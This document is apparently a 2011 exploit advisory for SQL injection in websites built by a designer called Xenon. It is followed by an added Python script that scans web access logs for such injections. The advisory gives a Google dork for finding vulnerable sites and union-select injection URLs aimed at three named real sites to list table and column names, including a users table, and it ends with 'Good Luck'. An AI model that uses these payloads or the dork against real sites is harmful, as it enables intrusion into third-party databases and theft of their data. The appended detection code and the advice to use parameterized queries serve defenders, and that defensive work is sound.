Sites designed by Xenon suffer from multiple remote SQL injection vulnerabilities.
c098a4388a127889dfd3764db922cde8244b6a82e61ff357ae5785d470fd40d5
# Exploit Title: Xenon SQL Injection Vulnerability
# Google Dork: intext:"Designed by Xenon" inurl:php?id=
# Date: 14.10.2011
# Author: m3rciL3Ss
# Service Link: http://xe.co.za/portfolio.shtml
# Version:
# Category: webapps
################################
# Demo site:
===[ SQL ]===
[»] http://www.hairhealthbeauty.co.za/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables
[»] http://northcoastkawasaki.co.za/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273
[»] http://www.sqdc.co.za/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
============================
Note: View Page Source ~ hairhealthbeauty
Note 2: The number of columns may vary
Note 3: On some of the websites the injection is blind SQL ~ northcoastkawasaki
===========================
################################
m3rciL3Ss.blogspot.com
twitter.com/_m3rciL3Ss
################################
Good Luck ~ bad english :)
################################
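
Added example for defenders, not part of the original advisory: every request listed above injects into a numeric id parameter of a PHP page, so a web access log can be checked for id values that are not plain integers. The log lines, the client addresses and the assumption that legitimate ids are non-negative integers of at most 10 digits are constructed for this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that appear in the requests listed in the advisory above.
SQLI_TOKENS = re.compile(
    r"union\s+select|information_schema|group_concat\s*\(|\b0x[0-9a-f]{4,}", re.I)
# Assumption: a legitimate id is a non-negative integer of at most 10 digits.
PLAIN_ID = re.compile(r"[0-9]{1,10}")

def classify_id(value):
    """Return 'ok', 'non_numeric' or 'sqli' for one URL-decoded id value."""
    if PLAIN_ID.fullmatch(value):
        return "ok"
    return "sqli" if SQLI_TOKENS.search(value) else "non_numeric"

def scan(lines):
    """Return (line_no, path, verdict) for each .php request whose id is not a plain integer."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(".php"):
            continue
        # parse_qs decodes %28 to "(" and "+" to a space before matching
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((n, url.path, verdict))
    return findings

# Constructed sample log (documentation-range client addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Oct/2011:10:00:01 +0200] "GET /news_detail.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Oct/2011:10:00:09 +0200] "GET /news_detail.php?id=-9+union+select+0,1,'
    'group_concat%28table_name%29,5+from+information_schema.tables HTTP/1.1" 200 6100',
    '198.51.100.7 - - [14/Oct/2011:10:00:15 +0200] "GET /viewstory.php?id=-8+and+1=1+union+select+0,'
    'group_concat%28column_name%29+from+information_schema.columns HTTP/1.1" 200 4300',
    '192.0.2.44 - - [14/Oct/2011:10:01:02 +0200] "GET /event.php?id=153%27 HTTP/1.1" 500 310',
    '192.0.2.10 - - [14/Oct/2011:10:01:30 +0200] "GET /index.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer check belongs in the application itself: rejecting any id that is not a plain integer, and passing it to the database through a parameterized query, removes the injection point rather than only detecting its use.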